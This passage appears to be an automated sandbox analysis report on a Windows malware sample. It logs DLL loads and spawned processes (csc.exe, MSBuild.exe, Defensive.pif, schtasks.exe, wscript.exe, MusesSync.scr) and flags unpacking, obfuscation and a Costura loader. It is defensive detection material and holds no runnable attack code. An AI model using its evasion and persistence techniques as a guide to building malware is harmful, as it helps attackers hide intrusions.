                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: file.exeStatic file information: File size 1651200 > 1048576
                    Source: file.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13f000
                    Source: Binary string: Bbfrth.pdb source: csc.exe, 00000002.00000002.4533996651.0000000009390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008101000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000002.00000003.2259371972.00000000084E7000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4535074365.0000000009F90000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F8B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Bbfrth.pdb( source: csc.exe, 00000002.00000002.4533996651.0000000009390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008101000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000002.00000003.2259371972.00000000084E7000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4535074365.0000000009F90000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F8B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2210000.2.unpack
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.file.exe.49eb26.1.raw.unpack, ConsumerParamConnector.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NYmWRTVrL33R8d5fMNc.cs.Net Code: Type.GetTypeFromHandle(X0AR9Tj55D1kCCmtVto.CpnODAMRKQ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X0AR9Tj55D1kCCmtVto.CpnODAMRKQ(16777250)),Type.GetTypeFromHandle(X0AR9Tj55D1kCCmtVto.CpnODAMRKQ(16777305))})
                    .NET source code contains potential unpacker
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 2.3.csc.exe.83d9988.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 2.3.csc.exe.83d9988.1.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 2.3.csc.exe.83d9988.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 2.3.csc.exe.83d9988.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 2.3.csc.exe.83d9988.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 2.2.csc.exe.96e0000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.808b8c8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4534757575.00000000096E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00434350 LoadLibraryW,GetProcAddress,0_2_00434350
                    Source: file.exeStatic PE information: real checksum: 0x844df should be: 0x1961de
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00437C80 push eax; ret 0_2_00437C9E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00437CA0 push eax; ret 0_2_00437CCE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094B7022 push ecx; ret 2_2_094B7027
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094B9670 pushfd ; ret 2_2_094B9671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_095011D1 push ds; ret 2_2_095011D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09501266 push ds; ret 2_2_0950126B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_0950122A push ds; ret 2_2_09501231
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09501745 push edi; iretd 2_2_09501746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004567E0 push eax; ret 4_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0045B9DD push esi; ret 4_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00455EAF push ecx; ret 4_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00433FF6 push ecx; ret 4_2_00434009
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A0E96 push ecx; ret 23_2_001A0EA9
                    Source: file.exeStatic PE information: section name: .text entropy: 6.827215242326264
                    Source: QuickTextPaste.exe.0.drStatic PE information: section name: .text entropy: 6.827215242326264
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, nxtXQoaJ3ugFER7ewaw.csHigh entropy of concatenated method names: 'clJa2Vi5wJ', 'y2CauBdk9C', 'oMDalhWtC6', 'lOMZV3sw95FwBD4kR8h', 'onxjn7siMaff7g23nlT', 'PlypjhsVmHFocMpuBHC', 'EWhb1UsnptkP3CqMA9l', 'fIso3FsjQ1fFwYpDYS5', 'SxI9J8scAxViO5iW3VK', 'J5cn5Hsattn73rbHIfE'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, h850quV7qvIeFvHQGqa.csHigh entropy of concatenated method names: 'OEjVgcmLKu', 'bDbVC9Su2d', 'zNiXAnuT2UMRbjKRtn4', 'jutbw5urKtqbkVLGyRM', 'rRWcILu6BpG9yn5vLK1', 'yS2ugQuspO7P7ZFbET0', 'TnJkSDuJlRsp9AYQIAO', 'yyYHvYuFUGyYnd2PdD9', 'SPjSjIu25dWkhlK52dV', 'F7FPQBuuCmivmQjqGwe'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'UgxNHkFfxdZ6595gLyw'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NYmWRTVrL33R8d5fMNc.csHigh entropy of concatenated method names: 'hs9aWZuYmx80D7GWBMc', 'uhJmj4uPnXsspxPCj3H', 'carn0LBpIE', 'avKEXplRvNpILa68Jj1', 'UP7FMOlGgZVYscgTOxk', 'GljWmTlaEVuJ5c7jHaN', 'UDhS5HlN113goMK0X0j', 'iYEAdHlwvP1Iomnb7A4', 'REXB7nliehNn1hIDIrm', 'mMnRUWlV45FnDn9yqcW'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, eZKrREGz94r0STs7USy.csHigh entropy of concatenated method names: 'TKhaRrWPfK', 'dG2aGWQV0m', 'FELaaOMFfW', 'NMjaNo2pAZ', 'SVIawyru47', 'JXKaiGv44D', 'SETox5Thgx2fPVJsUIw', 'H9yoP9TbY7jFgFBMoJp', 'L3PIVvTTKjVLJJoH5VM', 'UoHprfTrwUN974Mvm4u'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, IKC6huj6rws2PPFG95q.csHigh entropy of concatenated method names: 'RCHjM1B75B', 'i6LjZZgGmN', 'Q9WjthX2F8', 'jyEjX9fC35', 'NEijO8pSDe', 'c7kjqLxZOO', 'vZvjpT1Ijv', 'bKsjAEZS7G', 'M50jBG3xSf', 'smhj1YacDd'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, QXVgu30WxtH4pQUSkj.csHigh entropy of concatenated method names: 'nhcRUf53c8', 'Dw5RR2p4KN', 'ndHRGx7AP0', 'qDBRarZo2m', 'tBLRNg5QNo', 'qLgRw9tiOT', 'tiSRijmRU4', 'D9sRVlL8wk', 'LIyRnEEga0', 'DP8RjolQET'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, qcfXLXGcZWB1jRYMd7h.csHigh entropy of concatenated method names: 'BEfpAGhkE0wKiSVlTl1', 'DByfxwhddJrbZBCW4sw', 'Gw3eOChWMnmHqxqqYj7', 'O14ZlRhydVFCtHlTo1H', 'C8TglwhDU1QNYAcQafv', 'svhIbMhvoWXv6X8O0cq'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, PVtRg8anGo4iGsX0kwL.csHigh entropy of concatenated method names: 'lQyac8Jyty', 'yrLaffvy0y', 'WJFa3nsVTr', 'aMma8JkT5P', 'fkjrYQraPYNphPX7gTf', 'Fr3pVQrNs9BLKBvplOU', 'hQb9lyrwa7WHlyhcP2E', 'ueDCQDrig9S3Ai0Rgng', 'Iy9tS9rVyBCtEOJWsMw', 'Rqq8UgrngKMfdkOjKe8'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, iJbAMajIqp8vDivLXVv.csHigh entropy of concatenated method names: 'G6w7H6LxVT', 'CJW77sjXxK', 'CFv7mVibQw', 'PIY7gIR1D5', 'fZx7CWngoD', 'YSf75goUXC', 'mbZ7hHvnNn', 'mVZcfFv3qM', 'tuL7biVlh8', 'WZK7TdEWx9'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, siXnBHV3d43MD32W4Sy.csHigh entropy of concatenated method names: 'opJVKE0vGu', 'LYKVHWdojs', 'slTgGAuKWjb7by267Sf', 'roLmPruHsUUpGPhO1Np', 'lN5JKNu7FKxV97vTkx8', 'V4f4c3u3eSlXdGYoqed', 'OQmTNGu86wUGkc7wIn8', 'Q1wOfuumr3bTsaXCGWp', 'VPk5QougiX1MCUQQPKD', 'ajOhY4uC5RmXLUUMeCn'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, nY68pOejgW3TYLMwPC.csHigh entropy of concatenated method names: 'C3pDOTDrh', 'ieJvPVXAm', 'Ls2k80jmi', 'qLIdJBrQs', 'yGoWJ9rqG', 'KeDyUgs0w', 'T6ySnnHHs', 'VP3YAuM9J', 'NJ5P9U5DXcmyM12HZap', 'CA4SxZ5vFOGsTUZk9sh'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, TuDrsOFdF5IgWUpInC.csHigh entropy of concatenated method names: 'Q1julcNU0', 'zx5l4G0Wn', 'FEJEXlXgf', 'X5b9nK4gv', 'b0y4Ujug7', 'RScQ4NRq4', 'bFuq9WiMQ', 'ERoxao4pb', 'mrRM2TVPe', 'gG3ZavTCL'
